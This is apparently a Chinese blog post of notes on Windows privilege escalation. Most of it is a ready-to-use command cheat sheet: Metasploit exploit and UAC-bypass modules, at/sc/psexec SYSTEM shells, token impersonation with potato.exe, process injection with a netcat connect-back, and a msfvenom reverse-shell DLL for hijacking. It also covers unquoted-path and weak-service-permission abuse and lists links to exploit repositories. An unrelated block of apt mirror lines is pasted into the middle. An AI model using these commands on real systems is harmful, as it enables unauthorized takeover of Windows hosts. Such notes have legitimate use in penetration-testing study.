ms16-070

### 总结

流程:

靶机=>信息收集=>账户=>补丁

提权方法

工具

MSF全自动 => 生成反弹木马->监听端口->筛选exp模块->use攻击模块

Cobalt Strike(cs) => 监听端口->生成反弹木马->点击提权

进程迁移提权 => pinjector.exe工具

令牌窃取提权=>msf 监听端口->potato.exe工具(利用MS16_075/烂土豆 漏洞)

命令

at => 计划命令,可以在规定时间完成一些操作

sc => 针对服务 用于与服务控制管理器和服务进行通信的命令行程序 create start

ps => 微软插件(需下载)

getsystem=>uac绕过->msf ->search uac || UACME工具/Akagi64.exe

dll劫持=>火绒剑工具->.dll文件->开机自启动程序->制作dl木马上传

不带引号的不安全服务=>jaws-enum.psl工具 检测->start sc 服务名 利用

不安全的服务权限=>accesschk.exe工具 检测->配置->上线

常用命令

![NrK5vZMgsN6aNS0Wzm4Tfw](image/NrK5vZMgsN6aNS0Wzm4Tfw.png)

1当前权限 whoami
2操作系统版本(位数)ver
3漏洞补丁/杀软 systeminfo
4网络连接状态 tasklist/netstat -ano

-》后台权限-》系统权限
-》web权限-》系统权限
-》数据库-》系统权限
-》中间件-》系统权限

### 2.手工提权

#### 判断

工具判断

~~~
https://github.com/vulmon/vulmap
https //github.com/bitsadmin/wesng
*https //github.com/chroblert/windowsvulnscan
~~~

在线网站

~~~
https://i.hacking8.com/tiquan
复制system
~~~

#### EXP利用

~~~
https //github.com/k8gege/Ladon
https://github.com/Ascotbe/KernelHub
https://github.com/nomi-sec/PoC-in-GitHub
https //github.com/offensive-security/exploitdb
http://cve.mitre.org/data/refs/refmap/source-MS.html
~~~

### 3.MSF全自动

~~~
1.生成反弹木马
2.监听端口
background
sessions
3.筛选EXP模块
(半自动:根据漏洞编号找出系统中安装的补丁)

use post/windows/gather/enum_patches
set sessions ?
run

(全自动:快速识别系统中可能被利用的漏同)
use post/multi/recon/local_exploit_suggester
set session ?
set showdescription true
run

运行攻击模块use …
set session ?
run
提权置 system

例:
background
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
exploit
~~~

### 4.cs半自动

~~~
https://github.com/k8gege/Ladon
ladon40 badpotato whoami
~~~

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#aliyuan kali gengxinyuan
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyuncom/kali kali-rolling main non-free contrib
#163 DEBIAN yuan
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian wheezy main non-free contrib
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian wheezy-prioposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contri

### 5.win->at命令提权

~~~
at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。
适用版本:
Win2000&Win2003&XP中还是存在的,在Win7以后被剔除.
提权命令:
at 00:00 /interactive cmd
(在00:00分生成一个交互式的System权限的cmd)
~~~

### 6.win->sc命令提权

~~~
sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具.

适用版本
windows7、8、2003、2008、(2012、2016可能会失败 7,8)
提权命令

创建一个名叫syscmd的新的交互式的cmd执行服务
sc Create syscmd binPath=”cmd /K start” type=own type=interact
运行服务
sc start syscmd
~~~

### 7.win->ps命令提权

不是系统自带=>需要下载 微软

~~~
适用版本
Win2008&win2012&win2016等
上传PSEXEC.exe
psexec.exe -accepteula -s -i -d cmd
~~~

### 8.win->进程迁移提权

手动

~~~
上传 pinjector.exe
pinjector -l //查看具有system权限的pid
pinjector -p pid cmd 1111 //pid为有system权限
nc 靶机ip 1111
~~~

自动

~~~
msf 监听
ps 查看具有system权限的pid
migrate pid
~~~

### 9.win->令牌窃取提权

win2008/win2012/阿里云服务器

~~~
msf 监听
~~~

本地权限

~~~
use incognito
list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM”
~~~

web权限

令牌里没有system

~~~
上传potato.exe
execute -cH -f ./potato.exe //配合烂士豆(原理:利用Ms16_075漏洞)
use incognito
list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM”
~~~

### 10.win->getsystem提权

~~~
getsystem
~~~

存在uac

~~~
uac一般指用户账户控制。用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。
msconfig>工具
UAC有三个模式低、中、高。开启任意模式,getsystem命令失效。因此需要绕过
~~~

uac绕过

~~~
msf=>存在模块
search uac
使用bypassuac模块
Win7 本地电脑 本地权限
use exploit/windows/local/bypassuac

win 10 本地电脑 本地权限
use exploit/windows/local/ask (相当于钓鱼。用于最高等级)
use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_silentcleanup
~~~

UACME工具

编号 23 41 61

~~~
msf=>监听
Akagi64.exe 编号 木马绝对路径
getsystem
~~~

### 11.dll劫持

~~~

工具=>火绒剑=>寻找目标 .dll文件 =>开机自启动程序
制作dl木马上传
利用火绒剑进行进程分析加载DLL,一般程序DLL利用。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.156.148 lport=4444 -f dll > shell.dll
~~~

### 12.win->不带引号的不安全服务

原理

~~~
即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。

服务名称:为C:/AAX 86/MM.EXE
没有双引号+路径中有空格。
有则这是不安全的
可构造木马即路径为:C:/AA.exe
如此上面服务被调用的时候会调用到我们的木马程序
~~~

检测

~~~
方式一
1.msf上线+上传jaws-enum.psl文件
2.调用shell中的powershe11
3.执行文件.\jaws-enum.psl

方式二
检测命令:wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\\” |findstr /i /v “””
~~~

利用

~~~
sc start “服务名称” =>主动使用 需要高权限

开启自启 =>被动使用
~~~

### 13.Win->不安全的服务权限

检测

~~~
1.accesschk.exe -uwcqv “administrators” *
2.找权限为“SERVICE_ALL_ACCESS”的服务
3.配置 sc config “vds” binpath=”C:\1.exe
~~~

上线

“`
sc start vds 手动启动上线/或者等待服务被调用上线
“`

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注